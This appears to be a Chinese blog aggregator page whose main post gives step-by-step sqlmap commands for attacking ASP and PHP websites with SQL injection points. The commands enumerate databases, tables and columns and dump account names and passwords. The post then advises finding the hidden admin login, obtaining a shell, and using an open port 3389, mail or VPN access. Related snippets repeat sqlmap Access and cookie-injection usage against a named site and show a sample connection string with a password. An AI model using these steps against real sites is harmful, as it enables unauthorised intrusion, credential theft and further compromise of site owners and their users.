sqlmap攻击ASP、PHP有注入点的网站

找到注入点

1、设置sqlmap -u 地址 --dbs --current-user,

2、设置sqlmap -u 地址 --tables猜解表名,或者--dbms mysql --tables

3、设置sqlmap -u 地址 -T uname(表名) --columns猜解列名

4、设置sqlmap -u 地址 -T uname(表名) -C login-name,pass,username(列名,用逗号分隔) --dump获取数据

5、获取登录账号和密码后,找到管理登录口,一般比较隐蔽,可以通过工具、联系我们角落、源文件等等获取

6、进入后台以后,再争取拿shell,3389端口打开,进入邮箱或VPN等等

时间: 2024-12-22 09:59:37

sqlmap攻击ASP、PHP有注入点的网站的相关文章

WAF——针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等

核心概念 WAF Web应用防火墙(Web Application Firewall),简称WAF. Web攻击 针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入.XSS跨站.Webshell上传.命令注入.非法HTTP协议请求.非授权文件访问等.

Asp.net SQL注入实例分享

?? Asp.net SQL注入实例分享 1.web.config里加链接字段: <configuration> <connectionStrings > <add name="myConnectionString" connectionString="Server=10.231.248.177;Database=testdb;User ID=sa;Password=pa$$word;Trusted_Connection=False;"

Asp.NetCore依赖注入和管道方式的异常处理及日志记录

原文:Asp.NetCore依赖注入和管道方式的异常处理及日志记录 前言 ????在业务系统,异常处理是所有开发人员必须面对的问题,在一定程度上,异常处理的能力反映出开发者对业务的驾驭水平:本章将着重介绍如何在 WebApi 程序中对异常进行捕获,然后利用 Nlog 组件进行记录:同时,还将介绍两种不同的 异常捕获方式:管道捕获/服务过滤:通过本练习,将学习到如何捕获异常.处理异常跳转.记录异常信息. 1. 搭建框架 ????首先,创建一个 WebApi 项目,选择 Asp.Net Core W

asp.net如何抓取其他网站的内容

1. 需要引用的类库 using System.Net; using System.IO; using System.Text; using System.Text.RegularExpressions; 2. 获取其他网站网页内容的关键代码 WebRequest request = WebRequest.Create("http://目标网址.com/"); WebResponse response = request.GetResponse(); StreamReader read

c# asp.net 新建项目与新建网站区别

http://blog.sina.com.cn/s/blog_9a9e0bd601017iz3.html web应用程序----Web网站 1--web应用程序Default.aspx显示有两个原有文件及Default.aspx.cs和Default.aspx.designer.cs:Web网站Default.aspx显示有一个原有文件Default.aspx.cs. 2--web应用程序有重新生成和发布两项:Web网站只有一个发布网站. 3--Web应用程序和一般的winform没有什么区别都

1.sqlmap学习笔记之Access注入

使用sqlmap工具进行Acces注入:1.判断一个url是否存在注入点,根据返回数据判断数据库类型: .sqlmap.py -u "http://abcd****efg.asp?id=7" 假设返回内容如下: ------------------------- [INFO] resuming back-end DBMS 'microsoft access' ------------------------- 2.猜数据库表,输入: .sqlmap.py -u "http:/

3.sqlmap学习笔记之Cookie注入

Cookie注入: 1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.2.sqlmap命令提示符下输入下列内容进行跑表. sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2 假设返回内容如下,说明是access数据库. ------------------------- [INFO] resuming ba

sqlmap测试asp实战

如果检测到某个网址,比如www.XXXXXX.asp?id=26存在sql注入漏洞 爆表名 sqlmap -u "www.XXXXXX.asp?id=26" --tables 线程选10不到1分钟获取到所有表名 爆字段 这里针对book表 sqlmap -u "www.XXXXXX.asp?id=26" --columns -T "book" 线程数选10 同样不到一分钟,book表所有的字段全都爆出来了 获取所有表的内容 sqlmap -u &

sqlmap cookies站点的中转注入

如果说站点装了防注入程序 拿我们正规的注入就不成效果,就用到cookie中转注入 sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --level 2 Place: CookieParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=230 AND